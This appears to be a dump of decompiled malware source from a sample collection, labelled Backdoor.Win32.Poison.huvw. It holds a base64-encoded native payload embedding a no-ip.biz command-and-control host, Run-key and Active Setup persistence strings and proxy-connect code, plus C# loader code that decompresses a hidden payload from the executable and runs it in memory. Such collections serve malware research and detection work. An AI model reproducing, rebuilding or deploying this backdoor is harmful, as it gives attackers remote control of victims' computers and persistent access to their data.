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
</value>
</data>
</root>
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/Backdoor.Win32.Poison.huvw.csproj
+9
View File
@@ -0,0 +1,9 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{84B0B00B-FDF6-462B-AB24-D605FAB5C94B}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/Backdoor.Win32.Poison.huvw.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "!", "Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.csproj", "{84B0B00B-FDF6-462B-AB24-D605FAB5C94B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{84B0B00B-FDF6-462B-AB24-D605FAB5C94B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{84B0B00B-FDF6-462B-AB24-D605FAB5C94B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{84B0B00B-FDF6-462B-AB24-D605FAB5C94B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{84B0B00B-FDF6-462B-AB24-D605FAB5C94B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0001/_0001_0015.cs
+37
View File
@@ -0,0 +1,37 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using \u0001\u0002;
using \u0001\u0004;
using System;
using System.IO;
namespace \u0001\u0001
{
internal class \u0001\u0015
{
public byte[] \u0001\u0016(Stream inStream)
{
MemoryStream outStream = new MemoryStream();
byte[] numArray = new byte[5];
if (inStream.Read(numArray, 0, 5) != 5)
throw new Exception("Err");
\u0006\u0005 obj = new \u0006\u0005();
obj.\u0002\u000C(numArray);
long outSize = 0;
for (int index = 0; index < 8; ++index)
{
int num = inStream.ReadByte();
if (num < 0)
throw new Exception("Err");
outSize |= (long) (byte) num << 8 * index;
}
long inSize = inStream.Length - inStream.Position;
obj.\u0007\u000D(inStream, (Stream) outStream, inSize, outSize, (\u0002\u0002) null);
return outStream.ToArray();
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0001/_0002_0009.cs
+60
View File
@@ -0,0 +1,60 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using \u0001\u0001;
using System;
using System.IO;
using System.Reflection;
using System.Windows.Forms;
namespace \u0001\u0001
{
internal class \u0002\u0009
{
internal static int \u0002\u000A = 36864;
[STAThread]
private static void \u0002\u000E(string[] args)
{
try
{
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u0002\u0009.myResolveEventHandler);
}
catch (Exception ex)
{
}
object[] parameters = new object[1]{ (object) args };
MemoryStream inStream = new MemoryStream();
Stream stream = (Stream) new FileStream(Application.ExecutablePath.Substring(Application.ExecutablePath.LastIndexOf('\\') + 1), FileMode.Open, FileAccess.Read);
stream.Position = (long) \u0002\u0009.\u0002\u000A;
byte[] buffer = new byte[stream.Length - (long) \u0002\u0009.\u0002\u000A];
stream.Read(buffer, 0, Convert.ToInt32(buffer.Length));
inStream.Write(buffer, 0, buffer.Length);
inStream.Seek(0L, SeekOrigin.Begin);
Assembly assembly = Assembly.Load(new \u0001\u0015().\u0001\u0016((Stream) inStream));
try
{
assembly.EntryPoint.Invoke((object) null, parameters);
}
catch
{
assembly.EntryPoint.Invoke((object) null, (object[]) null);
}
}
private static Assembly myResolveEventHandler(object sender, ResolveEventArgs args)
{
string path = "_" + args.Name.ToString().Trim().Split(',')[0].ToString().Trim() + ".dll";
MemoryStream inStream = new MemoryStream();
Stream stream = (Stream) new FileStream(path, FileMode.Open, FileAccess.Read);
byte[] buffer = new byte[stream.Length];
stream.Read(buffer, 0, Convert.ToInt32(buffer.Length));
inStream.Write(buffer, 0, buffer.Length);
inStream.Seek(0L, SeekOrigin.Begin);
return Assembly.Load(new \u0001\u0015().\u0001\u0016((Stream) inStream));
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0002/_0001_0008.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
namespace \u0001\u0002
{
public enum \u0001\u0008
{
\u0001\u000A = 1024, // 0x00000400
\u0001\u0014 = 1025, // 0x00000401
\u0001\u0012 = 1026, // 0x00000402
\u0001\u0013 = 1088, // 0x00000440
\u0001\u000C = 1089, // 0x00000441
\u0001\u000D = 1090, // 0x00000442
\u0001\u0010 = 1104, // 0x00000450
\u0001\u0017 = 1105, // 0x00000451
\u0001\u0011 = 1120, // 0x00000460
\u0001\u0009 = 1136, // 0x00000470
\u0001\u000F = 1152, // 0x00000480
\u0001\u000B = 1168, // 0x00000490
}
}
